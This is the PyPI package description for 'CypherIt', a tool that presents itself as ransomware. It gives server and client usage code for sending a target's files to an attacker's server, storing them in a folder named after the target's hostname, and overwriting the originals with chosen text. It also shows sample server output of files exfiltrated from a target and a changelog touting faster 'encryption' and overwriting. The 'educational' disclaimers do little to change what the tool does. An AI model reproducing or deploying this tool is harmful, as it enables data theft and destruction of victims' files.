Metadata-Version: 2.1
Name: CypherIt
Version: 0.0.6
Summary: Renames all files and writes it with what ever you want. For more information check out my website:https://pypi.org/project/CypherIt/
Home-page: 
Author: Fawaz Bashiru
Author-email: fawazbashiru@gmail.com
License: MIT
Keywords: CypherIT
Classifier: Development Status :: 6 - Mature
Classifier: Intended Audience :: Education
Classifier: Operating System :: Microsoft :: Windows :: Windows 10
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Description-Content-Type: text/markdown

CypherIt
========

CypherIt is an intelligent tool which renames all the files to a txt file in a binder.You can write what ever you want.

All the files of the target will be saved in your directory and you can do what ever you want. The name of the directory is the targets hostname

Inspired by:
==========
B.I.GG. He had this wonderful idea. BIG thanks to him

HOW DOES CYPHERIT WORK
======================

If you are familiar to my style of packages. You already know how simple it is

First of all create a server:

Server
------

````python
import CypherIt as ci

ip, port = "127.0.0.1", 1234

server = ci.AttackingServer(ip, port)
server.start()
````

Client
------

````python
import CypherIt as ci

ip, port, path, text = "127.0.0.1", 1234, r"C:\\test", "ALI THE MASTER"
# You have to specify the path because this was just build for educational purposes. So please do not use it for bad thinks

data = ci.RansomClient(ip, port, path, text)
data.start()
````

Output of Server
--------------
````
Waiting for connection....
Connection has been established with ('192.168.0.73', 64328)
98_304 Bytes has been sent to the server
"_" stands for point
18 files have been saved to your directory
Waiting for connection....
````


You always have to run the server first and then the client.

The hostname of the target will be sent to your server

A Directory with the hostname of the target will be created.

All the data of target will be stored in that directory

Additional
=========
* PLEASE DO NOT HACK SOMEONE FOREIGN
* If you see "Connection has been established" at the server than you have to wait a bit for the data to arrive

Change Log
==========

0.0.1 (29/11/2022)
-----------------
- First Release

0.0.2 (29/11/2022)
-----------------
- Fix

0.0.3 (03/12/2022)
-----------------
- More intelligent
- Accurate connection
- Folder in path can also be written to a txt file
- file in the path will be overwritten even folders in the path
- Faster overwriting (ps. Still slow but I am working on it)
- Path error fixed

0.0.4 (04/12/2022)
------------------
- Better "encryption"
- Better Server
- MemoryError fixed
- Capacity of bytes has been increased to 8kb
- Python Package name fix

0.0.5 (07/12/2022)
-------------------
- Way faster encryption
- Better Code
- New function "all_data"

0.0.6 (10/12/2022)
-------------------
- New function "AI_check" this AI checks in every directory
- New output
- Bytes of target will be in the output
- Change directory more accurate
- Number of target files will be displayed at the output of the target
